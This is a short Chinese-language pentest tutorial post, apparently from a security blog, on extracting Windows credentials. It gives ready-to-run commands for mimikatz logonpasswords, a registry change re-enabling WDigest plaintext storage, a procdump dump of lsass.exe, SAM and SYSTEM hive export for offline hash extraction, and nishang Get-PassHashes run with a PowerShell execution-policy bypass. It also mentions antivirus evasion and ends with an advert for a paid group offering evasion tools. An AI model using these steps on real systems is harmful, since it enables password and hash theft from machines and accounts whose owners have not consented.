有师傅反应之前的文章有点太长篇大论 太干,故今日麋鹿换一些风格的文章,写一些简单的,希望能帮到大家,尤其是刚入门的师傅们!
一 猕猴桃mimikatz
适用于Windows 8.1 和 Windows Server 2012 R2 之前
privilege::debugsekurlsa::logonpasswords
Windows 8.1 和 Windows Server 2012 R2 之后,出于安全原因,默认情况下禁用了 WDigest 的明文密码存储
可以读到hash
所有我们要修改注册表
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
将 UseLogonCredential 设置为 1 然后重启
Shutdown -r -t 0
再用猕猴桃就可以获取到密码了
privilege::debug
sekurlsa::logonpasswords
或者 管理员打开cmd运行procdump导出dmp
https://learn.microsoft.com/zh-cn/sysinternals/downloads/procdump
多说一句,lsass.exe这个Windows系统进程,它负责处理与安全策略和登录身份验证相关的任务,功能有用户登录认证,创建访问令牌。下面这条命令的执行结果是创建一个lsass.exe 进程的完整内存转储文件(12.dmp)。
procdump64.exe -accepteula -ma lsass.exe 12.dmp
然后放到猕猴桃的目录
sekurlsa::minidump 12.dmp
sekurlsa::logonpasswords full
从注册表导出
reg save hklm\sam e:\sam.hive
reg save hklm\system e:\system.hive
其中hklm 代表 "HKEY_LOCAL_MACHINE",这是注册表的一个主分支。SAM 是其下的一个子分支,存储了与系统安全账户管理相关的信息,如用户账户和密码哈希。
把这两个hive放到猕猴桃目录
lsadump::sam /sam:sam.hive /system:system.hive
实战中,猕猴桃会被杀或者是不允许上传mimikatz,可以把这两个文件拖到自己的机器上读取,如下图我拖本机的密码到虚拟机里一样可以读取。
希望各位读者看完我们的文章以后自己去实践一下,只有学到脑子里的东西才是自己的,如果遇到困难,可以私信加本人微信,与麋鹿师傅一起探讨,炼心之路,就在脚下,我们一起成长。
三 powershell
用原版肯定被杀,有能力的可以做一下免杀
https://github.com/samratashok/nishang/blob/master/Gather/Get-PassHashes.ps1
powershell -exec bypass "import-module .\Get-PassHashes.ps1;Get-PassHashes"
★
欢 迎 加 入 星 球 !
代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员
进成员内部群
星球的最近主题和星球内部工具一些展示
加入安全交流群
关 注 有 礼
还在等什么?赶紧点击下方名片关注学习吧!
推荐阅读